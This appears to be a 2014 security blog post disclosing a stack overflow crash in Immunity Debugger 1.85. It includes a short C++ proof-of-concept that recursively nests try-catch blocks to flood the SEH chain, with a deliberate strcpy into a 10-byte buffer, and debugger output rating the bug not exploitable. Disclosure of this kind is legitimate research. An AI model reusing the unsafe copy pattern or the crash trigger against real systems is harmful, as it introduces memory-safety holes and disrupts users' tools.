Pages - Menu

Thursday, March 20, 2014

Immunity Debugger Stack Overflow Vulnerability – PoC

It's not always possible to find vulnerabilities or even zero days after using methods of reverse engineering or fuzzing, but this time I was super lucky. 2 months ago, I was studying Corelan’s article about heap spray exploitation which is a great one. During the study, while I was debugging Internet Explorer 7, Immunity Debugger (the last version, 1.85) has crashed and WinDBG handled the exception. I was really surprised.

When I looked back to determine what caused it to crash, I noticed that SE-Handler was recursively added to its SEH chain. Because SEH chain was created on stack segment and SEH chain was too long, this caused a stack overflow and Immunity Debugger crashed.



After realizing the cause of the crash, I quickly wrote a dirty PoC code to trigger the stack overflow vulnerability. The following PoC code creates try-catch blocks to overflow the stack.

/* ==================================================
Filename :  Crash_POC.cpp

Title : Immunity Debugger – Crash POC
Name: Immunity Debugger v1.85 SEH Chain Stack Overflow
Discoverer: Veysel HATAŞ (vhatas@gmail.com)
Vendor: Immunity Inc   
Systems Affected: Windows
Risk: Low
Status: Not Fixed

Discovered: 05 January 2014
Reported: 06 January 2014
Published: 20 March 2014

Description: Immunity Debugger V1.85 contains stack overflow vulnerability in //its SEH chain mechanism

=================================================== */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int g_Count;

void foo(char *data);

int main(int argc, char* argv[])
{
      g_Count = 0;

      foo(argv[1]);
      return 0;
}

void foo(char *data)
{
      char salla[10];

      printf("Deneme - %d\n", g_Count);
      g_Count++;

      if (g_Count == 510){
            strcpy(salla, data);
      }

      try{
            foo(data);
      }
      catch(int e){
            printf("Error code is : %d", e);
      }
}

It was tested on Windows 7 and Windows XP. In both of them, DEP protection was disabled.



When I look at the following !exploitable output, it is stated that this vulnerability is not exploitable. 

0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Read Access Violation near NULL starting at ImmunityDebugger!Addsorteddata+0x0000000000000069 (Hash=0xa84b56c5.0x36b8c4de)
This is a user mode read access violation near null, and is probably not exploitable. 

This vulnerability was reported to the Immunity to support@immunityinc.co on 06 January 2014.


Thursday, August 8, 2013

Hello World

Hello Everybody, This blog is created for researchers to have comprehensive knowledge about vulnerability research and exploit development.

We are planning to post about many subjects to this blog such as,
  • Exploit development 
  • Vulnerability research 
  • Fuzzing
  • Network packet injection
  • Malware Analysis
Additionally, Keep in mind that all posts in this blog will be only for academic usage. We are not responsible for malicious usage.

Have a nice research...